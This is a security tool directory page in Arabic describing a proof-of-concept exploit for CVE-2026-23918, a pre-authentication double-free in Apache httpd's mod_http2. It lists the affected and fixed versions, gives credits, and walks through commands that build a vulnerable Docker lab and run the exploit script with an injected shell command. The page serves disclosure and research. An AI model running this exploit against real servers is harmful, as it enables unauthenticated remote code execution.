Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-23918 — تحرير مزدوج (Double-free) في تنظيف تدفقات mod_http2 في Apache httpd يؤدي إلى تنفيذ تعليمات برمجية عن بُعد قبل المصادقة. | Kitploit
أدوات/GitHubGitHub/striga-ai/cve-2026-23918
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليماستغلال الملفات الثنائية
GitHubstriga-ai/cve-2026-23918

CVE-2026-23918

تحرير مزدوج (Double-free) في تنظيف تدفقات mod_http2 في Apache httpd يؤدي إلى تنفيذ تعليمات برمجية عن بُعد قبل المصادقة.

عرض المستودع
3164منذ 4 أشهرتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-23918

خطأ تحرير مزدوج في تنظيف تدفق mod_http2 في Apache httpd يؤدي إلى تنفيذ برمجيات عن بُعد قبل المصادقة.

المتأثر: httpd 2.4.66 مع mod_http2 و MPM متعدد الخيوط (event/worker). أُصلح في: 2.4.67.

تم الاكتشاف والإبلاغ بواسطة Bartlomiej Dmitruk (striga.ai) و Stanislaw Strzalkowski (isec.pl).

الشرح: https://striga.ai/research/apache-httpd-mod-http2-double-free

المتطلبات

  • Docker
  • Python 3

الاستخدام

قم ببناء وبدء البيئة الضعيفة:

root@kitploit:~
docker build -t httpd-poc .
docker run -d --name httpd-poc --privileged -p 9443:443 httpd-poc

احصل على عناوين system() و scoreboard:

root@kitploit:~
docker exec httpd-poc python3 /getaddr.py 1

قم بتشغيل الاستغلال:

root@kitploit:~
python3 poc.py --host localhost --port 9443 \
    --cmd 'date >> /tmp/win' --workers 64 \
    --system <system_addr> --scoreboard <scoreboard_addr>

تحقق (التنفيذ احتمالي، قد يستغرق دقائق إلى ساعات):

root@kitploit:~
docker exec httpd-poc cat /tmp/win

التنظيف

root@kitploit:~
docker rm -f httpd-poc
تنزيل الأداة